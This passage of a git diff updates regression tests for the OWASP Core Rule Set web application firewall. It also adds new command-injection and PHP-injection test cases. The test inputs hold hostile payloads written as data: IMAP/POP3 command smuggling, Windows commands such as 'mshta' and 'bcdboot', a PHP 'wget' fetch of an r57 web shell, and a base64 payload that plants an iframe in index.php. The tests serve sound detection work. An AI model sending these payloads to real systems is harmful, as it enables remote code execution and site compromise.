-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932310]
@@ -68,7 +68,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?text=Cannot%20authenticate%20anyways"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932310]
@@ -87,7 +87,7 @@ tests:
           uri: "/post"
           data: |
             textarea=%0D%0Aa001%20STATUS%20INBOX%20(MESSAGES)
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932310]
@@ -103,7 +103,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?text=Please%20send%20me%20an%20update%20status%20all%20messages%20are%20being%20denied"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932310]
@@ -122,7 +122,7 @@ tests:
           uri: "/post"
           data: |
             textarea=%0D%0Aa001%20uid%20store%20231%3A233%0D%0A
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932310]
@@ -138,7 +138,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?text=The%20uid%20is%020not%020working"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932310]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml
index 2ab494b9c..7708b7f5f 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml
@@ -16,7 +16,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?attackme=%0d%0aa001%20EXAMINE%20INBOX"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932311]
@@ -33,7 +33,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?text=We%examine%20this%20mail%20from%20Mars"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932311]
@@ -51,7 +51,7 @@ tests:
           uri: "/post"
           data: |
             textarea=%0d%0aa002%20copy%202%3A4%20MEETING
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932311]
@@ -69,7 +69,7 @@ tests:
           uri: "/post"
           data: |
             textarea=Just%20to%20remind%20you%20that%20I%20need%20to%20copy%20those%20documents
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932311]
@@ -87,7 +87,7 @@ tests:
           uri: "/post"
           data: |
             textarea=%0d%0aA1%20list%20%22INBOX%2F%22%20%22%2A%22
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932311]
@@ -105,7 +105,7 @@ tests:
           uri: "/post"
           data: |
             textarea=We%20need%20the%20list%20%22ASAP%22
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932311]
@@ -123,7 +123,7 @@ tests:
           uri: "/post"
           data: |
             textarea=%0d%0ad%20store%202%20%2BFLAGS%20%28%5CDeleted%29
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932311]
@@ -141,7 +141,7 @@ tests:
           uri: "/post"
           data: |
             textarea=%0aLet%27s%20go%20to%20the%20store%20%28sale%20time%21%29
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932311]
@@ -159,7 +159,7 @@ tests:
           uri: "/post"
           data: |
             textarea=%0d%0aA282%20SEARCH%20FLAGGED%20SINCE%201-Feb-1994%20NOT%20FROM%20%22Smith%22
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932311]
@@ -177,7 +177,7 @@ tests:
           uri: "/post"
           data: |
             textarea=%0d%0aZ001%20SEARCH%20CHARSET%20WINDOWS-1252%20DELETED%20SINCE%201-Feb-1994
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932311]
@@ -195,7 +195,7 @@ tests:
           uri: "/post"
           data: |
             textarea=%0d%0aA283%20SEARCH%20TEXT%20%22string%20not%20in%20mailbox%22
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932311]
@@ -213,7 +213,7 @@ tests:
           uri: "/post"
           data: |
             textarea=%0d%0aA284%20SEARCH%20CHARSET%20UTF-8%20TEXT%20%7B6%7D
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932311]
@@ -231,7 +231,7 @@ tests:
           uri: "/post"
           data: |
             textarea=In%20all%20search%20keys%20that%20use%20strings%2C%20a%20message%20matches%20the%20key%20if%20the%20string%20is%20a%20substring%20of%20the%20field.%20%20The%20matching%20is%20case-insensitive.
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932311]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml
index 248e5e706..6091b43ab 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml
@@ -16,7 +16,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?attackme=%0d%0aRETR%20123"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932320]
@@ -32,7 +32,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?text=Let%20me%20retrieve%2010%20of%20those"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932320]
@@ -50,7 +50,7 @@ tests:
           uri: "/post"
           data: |
             textarea=We%20should%20delete%20nine
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932320]
@@ -66,7 +66,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?attackme=%0d%0alist%203"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932320]
@@ -84,7 +84,7 @@ tests:
           uri: "/post"
           data: |
             textarea=This%20text%20is%20a%20way%20of%20list%203%20things
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932320]
@@ -100,7 +100,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?attackme=%0d%0aTOP%201%202"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932320]
@@ -118,7 +118,7 @@ tests:
           uri: "/post"
           data: |
             textarea=These%20are%20top%10%20rules
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932320]
@@ -134,7 +134,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?attackme=%0d%0aAUTH%20corerulest%20dGhpc2lzIWF0ZXN0cGFzc3dvcmQ="
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932320]
@@ -152,7 +152,7 @@ tests:
           uri: "/post"
           data: |
             textarea=Hey%2C%20sent%20me%20those%20auth%20codes%20please!
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932320]
@@ -168,7 +168,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?attackme=%0d%0aAPOP%20corerulest%207d0a3bd8e5b2abcfb3e256633c23b891"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932320]
@@ -186,7 +186,7 @@ tests:
           uri: "/post"
           data: |
             textarea=Look%2C%20apop%20star!
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932320]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml
index 81edbfea9..a02104c44 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml
@@ -16,7 +16,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?attackme=%0d%0aQUIT"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932321]
@@ -32,7 +32,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?text=Don't%20quit"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932321]
@@ -50,7 +50,7 @@ tests:
           uri: "/post"
           data: |
             textarea=we%20do%20not%20have%20that%20capability
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932321]
@@ -68,7 +68,7 @@ tests:
           uri: "/post"
           data: |
             textarea=Hi%20lestat!
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932321]
@@ -84,7 +84,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?attackme=%0aSeriously%2C%20noop"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932321]
@@ -102,7 +102,7 @@ tests:
           uri: "/post"
           data: |
             textarea=Someone%20bought%20this%20nice%20lerset
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932321]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml
index fb3b2d645..257837469 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml
@@ -16,7 +16,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?rce=!-1!-2"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932330]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml
index f147a23d5..77b5fc4c8 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml
@@ -16,7 +16,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?rce=!1"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932331]
@@ -32,7 +32,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?rce=!!"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932331]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml
index 422afebd9..7285bef0a 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml
@@ -17,7 +17,7 @@ tests:
           port: 80
           # "cmd=; regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey"
           uri: "/get?cmd%3D%3B%20regedit%20%2FE%20c%3A%5Cads%5Cfile.txt%3Aregfile.reg%20HKEY_CURRENT_USER%5CMyCustomRegKey"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932370]
@@ -34,7 +34,7 @@ tests:
           port: 80
           # "cmd=regedit "
           uri: "/get?cmd=regedit%20"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932370]
@@ -51,7 +51,7 @@ tests:
           port: 80
           # "cmd=; mshta http://example.com"
           uri: "/get?cmd=;%20mshta%20http://example.com"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932370]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml
index 8e4ad88c2..d255634e6 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml
@@ -19,7 +19,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?view%3Dimage.jpg%26bcdboot%20%3C%20file.txt"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932380]
@@ -38,7 +38,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?view%3Dimage.jpg%26bcdboot%20%2Fr%20file.txt"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932380]
@@ -57,7 +57,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?view%3Dimage.jpg%26bcdboot%2Fr%20file.txt"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932380]
@@ -76,7 +76,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?view%3Dimage.jpg%26bcdboot%20%20%2Fr%20file.txt"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932380]
@@ -95,7 +95,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/www/delivery/lg.php?bannerid=18&campaignid=1&zoneid=4&loc=https%3A%2F%2Fwww.example.com%2Ffoo%2Fbar%2Fx-x%2Fx%3Fs%3D2014-11-01%26e%3D2020-10-31%26ex%3D7%26page%3D1%26sort%3Dex%26sort%3Ddescending&referer=https%3A%2F%2Fwww.example.com%2Ffoo%2Fbar%2Fx-x%2Fx%3Fs%3D2014-11-01%26e%3D2020-10-31%26ex%3D7%26page%3D1%26sort%3Dex%26sort%3Dascending&cb=7de91ea349"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932380]
@@ -114,7 +114,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/url%2Fbla%3Ftest%3D1%26sort%3D0"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932380]
@@ -131,7 +131,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=test@coreruleset.org\"|bcdboot %SYSTEMROOT%\\win.ini"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932380]
@@ -173,3 +173,83 @@ tests:
         output:
           log:
             no_expect_ids: [932380]
+  - test_id: 10
+    desc: False positive against '; vol'
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            Accept-Encoding: gzip, deflate, br
+            Accept-Language: en-us,en;q=0.5
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+          data: |
+            payload=El primer avión de la aerolínea fue en Curtiss Robin; voló rutas domésticas como transporte de correos y pasajeros.
+        output:
+          log:
+            no_expect_ids: [932380]
+  - test_id: 11
+    desc: False positive against '; where'
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            Accept-Encoding: gzip, deflate, br
+            Accept-Language: en-us,en;q=0.5
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+          data: |
+            payload=This street is the home of the Foreign Office, Mycroft's place of work; where the Mazarin Stone was stolen, and Percy Phelps chased the thief of the naval treaty.
+        output:
+          log:
+            no_expect_ids: [932380]
+  - test_id: 12
+    desc: False positive against '; for'
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            Accept-Encoding: gzip, deflate, br
+            Accept-Language: en-us,en;q=0.5
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+          data: |
+            payload=A brief overview of methods is presented here; for detailed coverage, see the cross-referenced articles.
+        output:
+          log:
+            no_expect_ids: [932380]
+  - test_id: 13
+    desc: False positive against '; if'
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            Accept-Encoding: gzip, deflate, br
+            Accept-Language: en-us,en;q=0.5
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+          data: |
+            payload=I have no money, but I’m gonna push through; if nothing happens by the end of next year, it’s a sign I need to move back home.
+        output:
+          log:
+            no_expect_ids: [932380]
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml
index cf96b5e1f..4d0864037 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml
@@ -19,7 +19,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=<?exec('wget%20http://r57.biz/r57.txt%20-O"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [933100]
@@ -39,7 +39,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%3C%3Fphp%20echo(%5C%22KURWA%5C%22)%3B%20file_put_contents(%5C%22.%2Findex.php%5C%22%2C%20base64_decode(%5C%22Pz48aWZyYW1lIHNyYz0iaHR0cDovL3p1by5wb2Rnb3J6Lm9yZy96dW8vZWxlbi9pbmRleC5waHAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT48P3BocA%3D%3D%5C%22)%2C%20FILE_APPEND)%3B%20%3F%3E"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [933100]
@@ -55,7 +55,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=somePhpWouldGoHere%5B%2Fphp%5D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [933100]
@@ -71,7 +71,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=somePhpWouldGoHere%5B%5Cphp%5D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [933100]
@@ -89,7 +89,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%3C%3Fxml%20%3Aecho%201%3B"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [933100]
@@ -107,7 +107,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%3C%3Fxml%20%3Aecho%201%3B"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [933100]
@@ -125,7 +125,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%3C%3Fxml%20%3AfputCSV%28%24alreadyOpenFile%2C%20array%28%22foo%22%2C%20%22bar%22%2C%20%22hello%22%2C%20%22world%22%29%29%3B"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [933100]
@@ -143,7 +143,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%3C%3Fxml%20%20%20%09%09%09%09%09%09%20%28%29%3Becho%201%3B"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [933100]
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml
index edcc2c582..0873c2c8a 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml
@@ -1,7 +1,7 @@
 ---
 meta:
   author: "lifeforms, azurit"
-rule_id: 9333110
+rule_id: 933110
 tests:
   - test_id: 1
     desc: PHP no file upload
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml
index 47955fc8a..cc3dc500b 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml
@@ -1,6 +1,6 @@
 ---
 meta:
-  author: "Christian S.J. Peron, azurit"
+  author: "Christian S.J. Peron, azurit, Esad Cetiner"
 rule_id: 933120
 tests:
   - test_id: 1
@@ -17,7 +17,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=opcache.jit_max_polymorphic_calls%3d50"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [933120]
@@ -35,7 +35,7 @@ tests:
           uri: "/post"
           port: 80
           data: "var=session.referer_check%3dtrue"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             match_regex: 'session.referer_check found within ARGS:var:'
@@ -53,7 +53,7 @@ tests:
           uri: "/post"
           port: 80
           data: "var=engine%3dtrue"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [933120]
@@ -71,7 +71,7 @@ tests:
           uri: "/post"
           port: 80
           data: "var=extension%3dtrue"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [933120]
@@ -89,7 +89,7 @@ tests:
           uri: "/post"
           port: 80
           data: "var=mbstring.regex_retry_limit%3dtrue"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [933120]
@@ -107,7 +107,7 @@ tests:
           uri: "/post"
           port: 80
           data: "var=mbstring.regex_stack_limit%3dtrue"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [933120]
@@ -125,7 +125,7 @@ tests:
           uri: "/post"
           port: 80
           data: "var=precision%3dtrue"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [933120]
@@ -143,7 +143,7 @@ tests:
           uri: "/post"
           port: 80
           data: "var=smtp%3dtrue"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [933120]
@@ -161,7 +161,58 @@ tests:
           uri: "/post"
           port: 80
           data: "var=unserialize_max_depth%3dtrue"
-          version: HTTP/1.0
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [933120]
+  - test_id: 10
+    desc: "FP PHP Injection Attack: prevent matching base64 encoded requests"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: "localhost"
+            Cache-Control: "no-cache, no-store, must-revalidate"
+            User-Agent: "OWASP CRS test agent"
+            Accept: "*/*"
+          method: GET
+          uri: "/get?SAMLRequest=mhXNy9pMlFhTjBlRkkzSkpia1Y2cSMtPEE9PTwvc2FtbDpBdHRyaWJ1dGVWYWx1ZT48L3NhbWw6QXR0cmlidXRlPjwvc2FtbDpBdHRyaWJ1dGVTdGF0ZW1lbnQ+PC9zYW1sOkFzc2VydGlvbj48L3NhbWxwOlJlc3BvbnNlPg=="
+          port: 80
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [933120]
+  - test_id: 11
+    desc: "PHP Injection Attack: Block config directive with whitespace"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: "localhost"
+            Cache-Control: "no-cache, no-store, must-revalidate"
+            User-Agent: "OWASP CRS test agent"
+            Accept: "*/*"
+          method: GET
+          uri: "/get?code=memory_limit%20=%20512M"
+          port: 80
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [933120]
+  - test_id: 12
+    desc: "PHP Injection Attack: Block config directive with a path"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: "localhost"
+            Cache-Control: "no-cache, no-store, must-revalidate"
+            User-Agent: "OWASP CRS test agent"
+            Accept: "*/*"
+          method: GET
+          uri: "/get?code=extension_dir=/path/to/example"
+          port: 80
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [933120]
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933135.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933135.yaml
new file mode 100644
index 000000000..b8780faff
--- /dev/null
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933135.yaml
@@ -0,0 +1,185 @@
+---
+meta:
+  author: "azurit"
+rule_id: 933135
+tests:
+  - test_id: 1
+    desc: "${'ff'}"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            Accept-Encoding: gzip,deflate
+            Accept-Language: en-us,en;q=0.5
+            Host: localhost
+            Keep-Alive: '300'
+            Proxy-Connection: keep-alive
+            User-Agent: "OWASP CRS test agent"
+          method: GET
+          port: 80
+          uri: "/get?foo=%24%7B%27ff%27%7D"
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [933135]
+  - test_id: 2
+    desc: "$ {'fdf'}"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            Accept-Encoding: gzip,deflate
+            Accept-Language: en-us,en;q=0.5
+            Host: localhost
+            Keep-Alive: '300'
+            Proxy-Connection: keep-alive
+            User-Agent: "OWASP CRS test agent"
+          method: GET
+          port: 80
+          uri: "/get?foo=%24%20%7B%27fdf%27%7D"
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [933135]
+  - test_id: 3
+    desc: "$              {$a}"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            Accept-Encoding: gzip,deflate
+            Accept-Language: en-us,en;q=0.5
+            Host: localhost
+            Keep-Alive: '300'
+            Proxy-Connection: keep-alive
+            User-Agent: "OWASP CRS test agent"
+          method: GET
+          port: 80
+          uri: "/get?foo=%24%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7B%24a%7D"
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [933135]
+  - test_id: 4
+    desc: "$ {'_VAR'.'IABLE_NAME'}"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            Accept-Encoding: gzip,deflate
+            Accept-Language: en-us,en;q=0.5
+            Host: localhost
+            Keep-Alive: '300'
+            Proxy-Connection: keep-alive
+            User-Agent: "OWASP CRS test agent"
+          method: GET
+          port: 80
+          uri: "/get?foo=%24%20%7B%27_VAR%27.%27IABLE_NAME%27%7D"
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [933135]
+  - test_id: 5
+    desc: "$              {         $a}"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            Accept-Encoding: gzip,deflate
+            Accept-Language: en-us,en;q=0.5
+            Host: localhost
+            Keep-Alive: '300'
+            Proxy-Connection: keep-alive
+            User-Agent: "OWASP CRS test agent"
+          method: GET
+          port: 80
+          uri: "/get?foo=%24%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7B%20%20%20%20%20%20%20%20%20%24a%7D"
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [933135]
+  - test_id: 6
+    desc: "$     {   CONSTANT   }"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            Accept-Encoding: gzip,deflate
+            Accept-Language: en-us,en;q=0.5
+            Host: localhost
+            Keep-Alive: '300'
+            Proxy-Connection: keep-alive
+            User-Agent: "OWASP CRS test agent"
+          method: GET
+          port: 80
+          uri: "/get?foo=%24%20%20%20%20%20%7B%20%20%20CONSTANT%20%20%20%7D"
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [933135]
+  - test_id: 7
+    desc: "${}"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            Accept-Encoding: gzip,deflate
+            Accept-Language: en-us,en;q=0.5
+            Host: localhost
+            Keep-Alive: '300'
+            Proxy-Connection: keep-alive
+            User-Agent: "OWASP CRS test agent"
+          method: GET
+          port: 80
+          uri: "/get?foo=%24%7B%7D"
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [933135]
+  - test_id: 8
+    desc: "$ { }"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            Accept-Encoding: gzip,deflate
+            Accept-Language: en-us,en;q=0.5
+            Host: localhost
+            Keep-Alive: '300'
+            Proxy-Connection: keep-alive
+            User-Agent: "OWASP CRS test agent"
+          method: GET
+          port: 80
